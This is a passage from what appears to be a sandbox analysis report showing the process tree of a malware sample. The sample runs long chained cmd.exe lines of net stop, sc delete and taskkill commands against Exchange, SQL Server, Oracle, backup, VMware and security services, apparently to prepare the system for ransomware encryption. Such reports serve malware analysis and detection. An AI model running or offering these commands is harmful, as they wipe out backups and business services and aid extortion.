      net stop MSExchangeFrontEndTransport
      4⤵
      PID:1016
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
        5⤵
        
        PID:3164
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHM
      4⤵
      PID:872
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHM
        5⤵
        
        PID:5568
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SQL2008
      4⤵
      PID:5500
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL2008
        5⤵
        
        PID:4300
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHMRecovery
      4⤵
      PID:3832
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHMRecovery
        5⤵
        
        PID:5892
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeImap4
      4⤵
      PID:5484
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeImap4
        5⤵
        
        PID:5564
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIMAP4BE
      4⤵
      PID:5320
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIMAP4BE
        5⤵
        
        PID:5648
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIS
      4⤵
      PID:5592
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS
        5⤵
        
        PID:968
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxAssistants
      4⤵
      PID:3880
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5332
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxReplication
      4⤵
      PID:2380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxReplication
        5⤵
        
        PID:1836
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeNotificationsBroker
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
        5⤵
        
        PID:376
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangePop3
      4⤵
      PID:5452
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangePop3
        5⤵
        
        PID:2412
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangePOP3BE
      4⤵
      PID:5128
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangePOP3BE
        5⤵
        
        PID:2200
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeRepl
      4⤵
      PID:5244
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeRepl
        5⤵
        
        PID:5740
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeRPC
      4⤵
      PID:7196
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeRPC
        5⤵
        
        PID:6948
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeServiceHost
      4⤵
      PID:7396
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeServiceHost
        5⤵
        
        PID:4336
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeSubmission
      4⤵
      PID:5180
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeSubmission
        5⤵
        
        PID:6476
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeThrottling
      4⤵
      PID:2060
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeThrottling
        5⤵
        
        PID:5364
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeTransport
      4⤵
      PID:4924
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeTransport
        5⤵
        
        PID:6644
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeTransportLogSearch
      4⤵
      PID:7520
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeTransportLogSearch
        5⤵
        
        PID:1228
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeUM
      4⤵
      PID:6756
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeUM
        5⤵
        
        PID:1604
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeUMCR
      4⤵
      PID:7768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeUMCR
        5⤵
        
        PID:5328
  - - C:\Windows\SysWOW64\net.exe
      net stop MySQL5_OA
      4⤵
      PID:5220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL5_OA
        5⤵
        
        PID:5624
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT.exe /F & @net stop UFNet & @taskkill /IM MessageNotification.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete cbVSCService11 & @sc delete CobianBackup11"
    3⤵
    PID:3136
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ReportingServicesService.exe /F
      4⤵
      PID:1188
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SQL Server Reporting Services"
      4⤵
      PID:5056
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLFDLauncher
      4⤵
      PID:952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8CEServer.exe /F
      4⤵
      PID:1780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ServerNT.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5136
  - - C:\Windows\SysWOW64\net.exe
      net stop UFNet
      4⤵
      PID:5344
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFNet
        5⤵
        
        PID:232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MessageNotification.exe /F
      4⤵
      PID:5576
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbVSCService11.exe /F
      4⤵
      PID:5728
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOClientAgent
        5⤵
        
        PID:5992
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbService.exe /F
      4⤵
      PID:6072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete cbVSCService11
      4⤵
      PID:5748
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup11
      4⤵
      Launches sc.exe
      PID:5928
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
    3⤵
    PID:2008
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS LoPriv Services"
      4⤵
      PID:4560
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlsv3
      4⤵
      PID:5576
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftnlses3
      4⤵
      PID:5780
  - - C:\Windows\SysWOW64\sc.exe
      sc delete FxService
      4⤵
      Launches sc.exe
      PID:4952
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UtilDev Web Server Pro"
      4⤵
      Launches sc.exe
      PID:1448
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdwks
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ftusbrdsrv
      4⤵
      PID:4588
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client Guard"
      4⤵
      Launches sc.exe
      PID:4300
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE USBIP Client"
      4⤵
      Launches sc.exe
      PID:208
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "ZTE FileTranS"
      4⤵
      PID:5992
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wwbizsrv
      4⤵
      PID:5112
  - - C:\Windows\SysWOW64\sc.exe
      sc delete qemu-ga
      4⤵
      PID:4460
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AlibabaProtect
      4⤵
      Launches sc.exe
      PID:5308
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ZTEVdservice
      4⤵
      Launches sc.exe
      PID:5860
  - - C:\Windows\SysWOW64\sc.exe
      sc delete kbasesrv
      4⤵
      PID:5332
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MMRHookService
      4⤵
      PID:5328
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\sc.exe
      sc delete IpOverUsbSvc
      4⤵
      Launches sc.exe
      Suspicious use of AdjustPrivilegeToken
      PID:4876
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MsDtsServer100
      4⤵
      PID:5824
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KuaiYunTools
      4⤵
      PID:5020
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KMSELDI
      4⤵
      PID:6124
  - - C:\Windows\SysWOW64\sc.exe
      sc delete btPanel
      4⤵
      PID:5740
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Protect_2345Explorer
      4⤵
      Launches sc.exe
      PID:5524
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 2345PicSvc
      4⤵
      PID:1652
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-agent
      4⤵
      PID:6008
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-server
      4⤵
      PID:2884
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-worker
      4⤵
      PID:5244
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QQCertificateService
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:544
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleRemExecService
      4⤵
      PID:5824
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDaemon
      4⤵
      PID:5940
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSUserSvr
      4⤵
      PID:1800
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDownSvr
      4⤵
      PID:5828
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSStorageSvr
      4⤵
      PID:5296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDataProcSvr
      4⤵
      PID:4476
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSGatewaySvr
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMediaSvr
      4⤵
      Launches sc.exe
      Suspicious use of AdjustPrivilegeToken
      PID:5480
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSLoginSvr
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5560
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSTomcat6
      4⤵
      Launches sc.exe
      PID:2784
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMysqld
      4⤵
      PID:5932
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSFtpd
      4⤵
      Launches sc.exe
      PID:3988
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Zabbix Agent"
      4⤵
      PID:5872
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentAccelerator
      4⤵
      PID:2516
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bedbg
      4⤵
      PID:5320
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecDeviceMediaService
      4⤵
      PID:660
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecRPCService
      4⤵
      PID:5764
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecAgentBrowser
      4⤵
      PID:6024
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecJobEngine
      4⤵
      PID:3508
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BackupExecManagementService
      4⤵
      PID:5688
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MDM
      4⤵
      Launches sc.exe
      PID:4804
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TxQBService
      4⤵
      Launches sc.exe
      PID:436
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Gailun_Downloader
      4⤵
      PID:5596
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RemoteAssistService
      4⤵
      PID:6028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete YunService
      4⤵
      PID:1228
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Serv-U
      4⤵
      PID:1032
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "EasyFZS Server"
      4⤵
      PID:5504
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Rpc Monitor"
      4⤵
      PID:3144
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OpenFastAssist
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Nuo Update Monitor"
      4⤵
      PID:5468
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Daemon Service"
      4⤵
      PID:1452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete asComSvc
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OfficeUpdateService
      4⤵
      Launches sc.exe
      PID:5440
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RtcSrv
      4⤵
      Launches sc.exe
      PID:5728
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCASMCU
      4⤵
      PID:5808
  - - C:\Windows\SysWOW64\sc.exe
      sc delete FTA
      4⤵
      Launches sc.exe
      Suspicious use of AdjustPrivilegeToken
      PID:5484
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MASTER
      4⤵
      PID:1844
  - - C:\Windows\SysWOW64\sc.exe
      sc delete NscAuthService
      4⤵
      Launches sc.exe
      PID:5580
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMUnzipService
      4⤵
      PID:6236
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMAsyncService$maintenance
      4⤵
      PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
    3⤵
    PID:3464
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1ClrAgent
      4⤵
      PID:2420
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleOraDb11g_home1TNSListener
      4⤵
      PID:5292
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:5752
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleServiceORCL
      4⤵
      PID:4460
  - - C:\Windows\SysWOW64\sc.exe
      sc delete aspnet_state @sc delete Redis
      4⤵
      Launches sc.exe
      PID:4336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleVssWriterORCL
      4⤵
      PID:5932
  - - C:\Windows\SysWOW64\sc.exe
      sc delete JhTask
      4⤵
      PID:6004
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      Launches sc.exe
      PID:5620
  - - C:\Windows\SysWOW64\sc.exe
      sc delete XT800Service_Personal
      4⤵
      PID:3200
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MCService
      4⤵
      PID:4240
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ImeDictUpdateService
      4⤵
      PID:6076
  - - C:\Windows\SysWOW64\sc.exe
      sc delete allpass_redisservice_port21160
      4⤵
      PID:6116
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Flash Helper Service"
      4⤵
      Launches sc.exe
      PID:5640
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Kiwi Syslog Server"
      4⤵
      Launches sc.exe
      PID:3436
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "UWS HiPriv Services"
      4⤵
      Launches sc.exe
      PID:5968
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$FE_EXPRESS
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$FE_EXPRESS
        5⤵
        
        PID:4004
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
    3⤵
    PID:228
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "DAService_TCP"
      4⤵
      PID:5164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "eCard-TTransServer"
      4⤵
      Launches sc.exe
      PID:4240
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eCardMPService
      4⤵
      PID:5684
  - - C:\Windows\SysWOW64\sc.exe
      sc delete EnergyDataService
      4⤵
      Launches sc.exe
      PID:5592
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UI0Detect
      4⤵
      PID:4560
  - - C:\Windows\SysWOW64\sc.exe
      sc delete K3MobileService
      4⤵
      Launches sc.exe
      PID:6032
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TCPIDDAService
      4⤵
      PID:5920
  - - C:\Windows\SysWOW64\sc.exe
      sc delete WebAttendServer
      4⤵
      PID:5860
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UIODetect
      4⤵
      Launches sc.exe
      PID:5476
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "wanxiao-monitor"
      4⤵
      PID:5512
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMAuthdService
      4⤵
      PID:5524
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMUSBArbService
      4⤵
      PID:660
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMwareHostd
      4⤵
      PID:3284
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "vm-agent"
      4⤵
      PID:5532
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VmAgentDaemon
      4⤵
      PID:5520
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OpenSSHd
      4⤵
      PID:5140
  - - C:\Windows\SysWOW64\sc.exe
      sc delete eSightService
      4⤵
      PID:6040
  - - C:\Windows\SysWOW64\sc.exe
      sc delete apachezt
      4⤵
      PID:5484
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Jenkins
      4⤵
      PID:660
  - - C:\Windows\SysWOW64\sc.exe
      sc delete secbizsrv
      4⤵
      Launches sc.exe
      PID:2704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLTELEMETRY
      4⤵
      PID:2264
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSMQ
      4⤵
      Launches sc.exe
      PID:5992
  - - C:\Windows\SysWOW64\sc.exe
      sc delete smtpsvrJT
      4⤵
      PID:3164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete zyb_sync
      4⤵
      Launches sc.exe
      PID:5616
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntHttpServer
      4⤵
      PID:5304
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntSvc
      4⤵
      PID:5968
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntClientSvc
      4⤵
      PID:6012
  - - C:\Windows\SysWOW64\sc.exe
      sc delete NFWebServer
      4⤵
      PID:4512
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wampapache
      4⤵
      PID:968
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSEARCH
      4⤵
      PID:5356
  - - C:\Windows\SysWOW64\sc.exe
      sc delete msftesql
      4⤵
      PID:6092
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SyncBASE Service"
      4⤵
      PID:5472
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleDBConcoleorcl
      4⤵
      Launches sc.exe
      PID:6028
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2420
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleMTSRecoveryService
      4⤵
      PID:4476
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
    3⤵
    PID:2700
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "XT800Service_Personal"
      4⤵
      PID:5200
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLSERVERAGENT
      4⤵
      PID:1828
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLWriter
      4⤵
      PID:6112
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLBrowser
      4⤵
      Launches sc.exe
      PID:5896
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLFDLauncher
      4⤵
      PID:5444
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLSERVER
      4⤵
      Launches sc.exe
      PID:5488
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QcSoftService
      4⤵
      PID:1452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLServerOLAPService
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VMTools
      4⤵
      PID:6128
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VGAuthService
      4⤵
      Launches sc.exe
      PID:6140
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSDTC
      4⤵
      PID:3164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TeamViewer
      4⤵
      PID:5292
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ReportServer
      4⤵
      PID:2956
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RabbitMQ
      4⤵
      PID:5868
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "AHS SERVICE"
      4⤵
      Launches sc.exe
      PID:5548
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "Sense Shield Service"
      4⤵
      PID:5304
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSMonitorService
      4⤵
      PID:5468
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SSSyncService
      4⤵
      Launches sc.exe
      PID:4032
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdAppService1300
      4⤵
      PID:2420
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQL$SQL2008
      4⤵
      PID:5296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLAgent$SQL2008
      4⤵
      PID:5452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdTaskService1300
      4⤵
      Launches sc.exe
      PID:2060
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TPlusStdUpgradeService1300
      4⤵
      Launches sc.exe
      PID:4692
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VirboxWebServer
      4⤵
      Launches sc.exe
      PID:2420
  - - C:\Windows\SysWOW64\sc.exe
      sc delete jhi_service
      4⤵
      PID:676
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LMS
      4⤵
      Launches sc.exe
      PID:5600
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FontCache3.0.0.0"
      4⤵
      PID:5428
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "OSP Service"
      4⤵
      Launches sc.exe
      PID:952
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"
    3⤵
    PID:1928
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Tomcat7w.exe /F
      4⤵
      Kills process with taskkill
      PID:4388
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
      4⤵
      PID:5208
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F
      4⤵
      PID:5952
